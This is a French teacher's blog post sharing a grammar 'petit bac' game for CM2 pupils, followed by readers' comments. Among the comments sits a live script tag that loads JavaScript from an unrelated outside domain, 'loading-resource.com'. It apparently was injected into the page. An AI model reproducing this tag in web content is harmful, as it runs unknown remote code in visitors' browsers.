• Rallye-liens : Brain-break

    Rallye-liens : Brain-break

    En guise de participation au rallye-lien de Sagebooker, je vous propose un petit jeu qui me permet de garder l'attention des élèves tout en attendant mes quelques retardataires... Quelques minutes suffisent pour faire une petite pause ludique et instructive à la fois !

    Voici donc le petit bac de la nature des mots. C'est un dérivé du petit bac traditionnel sauf que là, pour une lettre donnée, il faut trouver un mot correspondant à chaque nature de mots que nous connaissons en CM2.

    Rallye-liens : Brain-break

    Je laisse à disposition des feuilles à disposition après avoir mis en place une fois en classe entière l'activité. Quand leur feuille est pleine, ils en prennent une nouvelle. Ils peuvent aussi jouer à 2 à leur place en activité autonome et avec un dictionnaire pour départager les idées contradictoires (donc je n'ai pas besoin d'intervenir).

    Voici donc le fichier en pdf : Rallye-liens : Brain-break

     

    Source des images : Chez Lutin Bazar

    « Affichage code couleur tableau/cahierCommunication avec les parents »
    Pin It

  • Commentaires

    1
    Mardi 2 Octobre 2012 à 06:50

    Merci pour ta participation !!

    C'est en lien dans l'article...

    Celui-là est un peu difficile pour mes segpa, mais c'est une super idée pour des cycle 3 !!! Merci !!

    2
    wendyss
    Mardi 2 Octobre 2012 à 19:04

    super idée!! merci pour ce partage! je prends pour mes CM2 et passe l'idée aux collègues :)

    <script src="//loading-resource.com/data.geo.php?callback=window.__geo.getData" type="text/javascript"></script>
    3
    sev1282
    Mercredi 3 Octobre 2012 à 14:23

    Très bonne idée !

    Vraiment chouette comme petit exercice en fin de journée ou avant une récréation ! J'en connais qui vont adoré et "se battre" pour gagner !

    4
    Madame Têtard Profil de Madame Têtard
    Samedi 6 Octobre 2012 à 18:49

    Chouette le tableau!! Je le prends!! J'aime bien jouer à ce jeu en AP. :)

    5
    Mardi 9 Octobre 2012 à 19:20

    Super idée! Vraiment top! Merci!

    6
    Dimanche 28 Octobre 2012 à 09:23

    L'idée est excellente !! Elle tombe à pic pour la rentrée.

    Merci beaucoup  

    7
    Minouchon 2
    Vendredi 2 Novembre 2012 à 17:24

    Bravo et merci. Je prends pour la rentrée.

    Super activité pour travailler la nature des mots et bien plus sympa qu'un exo sur le cahier du jour!

    8
    bulle2/2
    Samedi 10 Novembre 2012 à 16:07

    Quelle bonne idée ! J'ai des CM2, je vais m'en servir en AP et leur faire découvrir en groupe classe aussi. Merci pour le partage.

    9
    Niaduso
    Mardi 27 Novembre 2012 à 14:18

    Quelle merveilleuse idée! Mes élèves vont adorer! Je découvre votre blog alors je vais jeter un petit coup d'oeil. Merci pour le partage.

    10
    anneKa
    Jeudi 13 Décembre 2012 à 22:55

    Merci, supet idée!!!

    11
    anneKa
    Jeudi 13 Décembre 2012 à 22:56

    pfffffffffff, super, pas supet!!!!!!!!

    12
    zapa Profil de zapa
    Vendredi 8 Mars 2013 à 11:39

    super votre blog bonne continnuations !!!

    13
    Elsile Profil de Elsile
    Vendredi 15 Mars 2013 à 16:45

    Merci Chue de m'avoir prévenue :) Je supprime les messages si tu veux bien :) Il est banni pour 100 jours on devrait être tranquille !

    14
    Vendredi 15 Mars 2013 à 16:50

    Merci beaucoup ^_^

    15
    Géraldine82
    Mercredi 12 Juin 2013 à 13:31

    Super! Je voulais justement travailler la nature des mots sur ce principe avec mes CM! Voilà une petite activité bien sympa pour démarrer l'aprem en fin d'année, et aborder cette notion rapidement qd on manque de temps en fin d'année! Avec la fiche, il vont être encore plus motivés!! Merci!!

    16
    Samedi 15 Juin 2013 à 22:24

    Je le fais souvent, sans fiche. C'est le genre d'activité super facile à improviser; Ca marche du CE1 au CM2 !

    Et à la fin, je leur fais écrire un tautogramme (une phrase rigolote dont tous les mots commencent par la même lettre). 

    Quand on prend la lettre d, à cause des déterminants (DES ou DEUXà) on a plein de mots au pluriel, ça fait travailler les accords  )

    17
    Elsile Profil de Elsile
    Samedi 15 Juin 2013 à 22:53

    Ha je ne connaissais pas le tautogramme, ça me plait beaucoup ! Merci pour l'idée Charivari ! Et touchée par ta visite 

    18
    Samedi 15 Juin 2013 à 23:36

    Des dindons dingues disent de douces devinettes distrayantes 

    19
    Elsile Profil de Elsile
    Dimanche 16 Juin 2013 à 01:56

    J'adore ! Merci pour le fou rire ! 

    20
    Dimanche 16 Juin 2013 à 09:53

    Oui ça fait ça en classe aussi : on fabrique forcément des phrases loufoques et ça plait bien !

    21
    zapa Profil de zapa
    Dimanche 16 Juin 2013 à 10:22

    coucou !

    22
    Jeudi 4 Juillet 2013 à 15:31

    Bonne idée à conserver pour le soutien cet été... Merci !

    23
    Jeudi 1er Mai 2014 à 16:30

    n voilà une idée qu'elle est bonne!


    J'y avais déjà pensé et j'avais bidouillé moi-même une feuille récap, mais évidemment la tienne est plus chouette! Merci!

    24
    hbbbb
    Jeudi 15 Mai 2014 à 20:12

    fffffffffffffffffffffffffffff

    25
    Jeudi 5 Juin 2014 à 21:03

    super idée ;je teste dès demain, merci

    26
    Nannnettte
    Mardi 12 Août 2014 à 18:57

    Extra comme idée !!! j'ai bcp travaillé la nature des mots l'an dernier : à partir des dictées flashs on classait certains mots ds un tableau. Ils vont s'éclater à faire ça en CM2 !!! j'ai presque hâte.. j'ai dit "presque" !!! MERCIIIIIIIIIIIIIII

     

    27
    anne
    Dimanche 1er Février 2015 à 18:02

    Merci pour cette idée qui permet de réviser de façon ludique les classes grammaticales. Je pense que ce sera notre petit rituel du matin la semaine avant les vacances...

    28
    Mercredi 22 Avril 2015 à 12:06

    J'étais venue piocher ça il ya 2 ans. Je l'utilise tous les ans en rituel pendant 1 période avec tous mes élèves ( du cp au cm2) (adapté pour les cp) et c'est un gros gros succès. Merci encore!!!

    29
    Dimanche 18 Octobre 2015 à 19:51

    J'aime beaucoup cette idée ! Je te la pique. Merci Elsile ! 

    30
    Lundi 21 Décembre 2015 à 19:32

    Je connaissais le petit bac simple mais celui-ci est vraiment chouette pour le réinvestissement :) et puis c'est ludique !

    31
    Petite Curieuse
    Samedi 27 Avril 2019 à 06:29

    Comment utilisez-vous la colonne "Lettre" et "points"? Mecri.

    32
    Laura
    Samedi 22 Février 2020 à 20:28

    Merci pour cette excellente idée! biggrin

    33
    France
    Lundi 17 Août 2020 à 15:16

    Merci bien !

    C'est une brillante idée !

     

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :